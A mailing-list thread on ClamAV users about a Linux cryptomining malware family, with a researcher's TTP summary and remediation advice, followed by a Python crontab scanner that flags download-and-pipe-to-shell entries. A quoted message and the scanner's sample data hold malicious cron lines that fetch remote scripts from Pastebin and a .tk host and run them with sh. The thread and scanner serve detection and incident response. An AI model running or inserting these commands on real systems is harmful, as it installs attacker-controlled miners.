[clamav-users] LSD Malwares

Andrew Williams awillia2 at sourcefire.com
Fri Apr 26 22:36:15 UTC 2019


Xavier,

From the information you provided in your initial email, it sounds like the
malware you encountered is described in-depth here:

https://www.anomali.com/blog/rocke-evolves-its-arsenal-with-a-new-malware-family-written-in-golang

That blog post provides a lot of insight into what the malware they
analyzed did, which will hopefully provide you with a way to better
understand what the malware may have done on your machines.  It's difficult
to know for sure, though, since the one you encountered may have had
differences to the one described.  Your best bet to remediate is to just
restore the server from known-good backups, if possible.

At the end of last year, we published a blog post that tracked three groups
spreading this type of malware.  From
https://blog.talosintelligence.com/2018/12/cryptomining-campaigns-2018.html,
the groups tended to follow these TTPs:
- Used malicious shell scripts masquerading as JPEG files with the name
"logo*.jpg" that install cron jobs and download and execute miners.
- Used variants of the open-source miner XMRig intended for botnet mining,
with versions dependent on the victim's architecture.
- Scanned for and attempted to exploit recently published vulnerabilities
in servers such as Apache Struts2, Oracle WebLogic and Drupal.
- Used malicious scripts and malware hosted on Pastebin sites, Git
repositories and domains with .tk TLDs.

As you can tell, there's a lot of overlap between all of these, and it's
not uncommon for one actor to take the scripts and binaries used by another
and start using them (with slight modifications to use different C2, mine
to a different wallet, etc.)

Since there's so much overlap between tools and techniques, it's difficult
to say for sure, but at first glance the infrastructure described in the
Anomali blog post appears related to that of the malware described by these
two articles as well:

Nov 2018:
https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/cryptocurrency-mining-malware-targets-linux-systems-uses-rootkit-for-stealth
Feb 2019:
https://blog.trendmicro.com/trendlabs-security-intelligence/linux-coin-miner-copied-scripts-from-korkerds-removes-all-other-malware-and-miners/

-Andrew

Andrew Williams
Malware Research Engineer
Cisco Talos



On Thu, Apr 25, 2019 at 11:27 PM Xavier Maysonnave via clamav-users <
clamav-users at lists.clamav.net> wrote:

> Hi All,
>
> Thanks for your feedback.
> I'm going to report to Cloudflare this URL.
>
> However, keep in mind that there are other URLs that are involved in this
> family.
> */10 * * * * (curl -fsSL https://pastebin.com/raw/wR3ETdbi||wget -q -O-
> https://pastebin.com/raw/wR3ETdbi)|sh
> This one targets Jenkins, another popular OpenSource tool, not used on our
> infrastructure though.
>
> I'm still very interested in the consequences of this malware. Any
> hints will be greatly appreciated.
>
> Thanks.
>
> Light
>
> Pudhuveedu / Xavier
>
> PGP Fingerprint: CAE5 CE4A EFE9 134F D991 5465 081C B6FB 2EAC 6CC9
> <http://keyserver.ubuntu.com/pks/lookup?op=get&search=0x081CB6FB2EAC6CC9>
>
>
> On Fri, Apr 26, 2019 at 08:03, Dave Warren via clamav-users <
> clamav-users at lists.clamav.net> wrote:
>
>> The same applies: Report it. Cloudflare will either forward the
>> complaint for you, or block the offending URL (or both).
>>
>> On 2019-04-25 19:16, Dennis Peterson wrote:
>> > That domain is hosted on a cloudflare IP block. They've become part of
>> > the problem.
>> >
>> > dp
>> >
>> > On 4/25/19 7:52 AM, J.R. via clamav-users wrote:
>> >> Perhaps it would also be worthwhile to report dd.heheda.tk to their
>> >> hosting provider & domain registrar that they are hosting malware and
>> >> get that site shut down...
>> >>
>>
>> _______________________________________________
>>
>> clamav-users mailing list
>> clamav-users at lists.clamav.net
>> https://lists.clamav.net/mailman/listinfo/clamav-users
>>
>>
>> Help us build a comprehensive ClamAV guide:
>> https://github.com/vrtadmin/clamav-faq
>>
>> http://www.clamav.net/contact.html#ml
>>
>
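The cron-job TTP described above (a `*/10` entry that pipes a raw Pastebin paste into `sh`, "logo*.jpg" lures, `.tk` hosting) is straightforward to hunt for in crontabs. The script below is an added example written for this thread, not code from any of the referenced reports or from ClamAV: it parses crontab lines, separates the schedule from the command, and tags commands that download-and-pipe into a shell, fetch raw Pastebin content, pull from a `.tk` domain, or execute a `.jpg` with a shell. The sample crontab is constructed; line 3 is the entry Xavier quoted, `malicious-example.tk` is a placeholder, and the tag names are my own.

```python
import re
from dataclasses import dataclass
from typing import List, Tuple
from urllib.parse import urlparse

# Constructed sample crontab. Line 3 is the entry quoted in the thread; the
# other lines are made up here to exercise the benign and .tk/logo*.jpg cases.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 2 * * * /usr/bin/certbot renew --quiet
*/10 * * * * (curl -fsSL https://pastebin.com/raw/wR3ETdbi||wget -q -O- https://pastebin.com/raw/wR3ETdbi)|sh
*/15 * * * * wget -q -O /tmp/logo4.jpg http://malicious-example.tk/logo4.jpg && sh /tmp/logo4.jpg
@hourly /usr/local/bin/backup.sh
30 4 * * * curl -s https://updates.example.org/status > /dev/null
"""

# Five schedule fields, or an @keyword, followed by the command.
SCHEDULE_RE = re.compile(
    r"^(?:@(?:reboot|yearly|annually|monthly|weekly|daily|hourly)\s+|(?:\S+\s+){5})"
)
URL_RE = re.compile(r"https?://[^\s|&;()'\"<>]+")
DOWNLOADER_RE = re.compile(r"\b(?:curl|wget)\b")
PIPE_TO_SHELL_RE = re.compile(r"\|\s*(?:ba|da|z|k)?sh\b")
SHELL_RUNS_JPG_RE = re.compile(r"\b(?:ba)?sh\s+\S+\.jpe?g\b")
LOGO_JPG_RE = re.compile(r"^logo.*\.jpe?g$", re.IGNORECASE)


@dataclass
class Finding:
    line_no: int
    command: str
    tags: List[str]
    urls: List[str]


def classify_command(command: str) -> Tuple[List[str], List[str]]:
    """Return (tags, urls) for one cron command; empty tags means nothing matched."""
    tags = []
    urls = URL_RE.findall(command)
    # curl/wget output fed straight into a shell interpreter
    if DOWNLOADER_RE.search(command) and PIPE_TO_SHELL_RE.search(command):
        tags.append("download-piped-to-shell")
    # a file with a .jpg extension being executed by sh/bash
    if SHELL_RUNS_JPG_RE.search(command):
        tags.append("shell-executes-jpg")
    for url in urls:
        parsed = urlparse(url)
        host = (parsed.hostname or "").lower()
        basename = parsed.path.rsplit("/", 1)[-1]
        if host.endswith("pastebin.com") and parsed.path.startswith("/raw/"):
            tags.append("pastebin-raw")
        if host.endswith(".tk"):
            tags.append("tk-domain")
        if LOGO_JPG_RE.match(basename):
            tags.append("logo-jpg-lure")
    # Keep first-seen order but drop duplicates (the same URL often appears twice).
    return list(dict.fromkeys(tags)), list(dict.fromkeys(urls))


def scan_crontab(text: str) -> List[Finding]:
    """Scan a user crontab (5 schedule fields + command) and return suspicious entries."""
    findings = []
    for line_no, raw in enumerate(text.splitlines(), start=1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        m = SCHEDULE_RE.match(line)
        if not m:
            continue  # environment assignment (PATH=...) or malformed line
        command = line[m.end():]
        tags, urls = classify_command(command)
        if tags:
            findings.append(Finding(line_no, command, tags, urls))
    return findings


if __name__ == "__main__":
    for f in scan_crontab(SAMPLE_CRONTAB):
        print(f"line {f.line_no}: {', '.join(f.tags)}")
        print(f"    {f.command}")
        for url in f.urls:
            print(f"    url: {url}")
```

To run it against a live host, feed it the output of `crontab -l` for each user, plus the files under `/var/spool/cron` and `/etc/cron.d`; note that `/etc/crontab` and `/etc/cron.d` entries carry an extra user field after the schedule, so `SCHEDULE_RE` would need one more `\S+\s+` for those. Any hit on `download-piped-to-shell` is worth treating as a compromise indicator regardless of the host involved, which matches Andrew's advice to rebuild from known-good backups rather than trust the box.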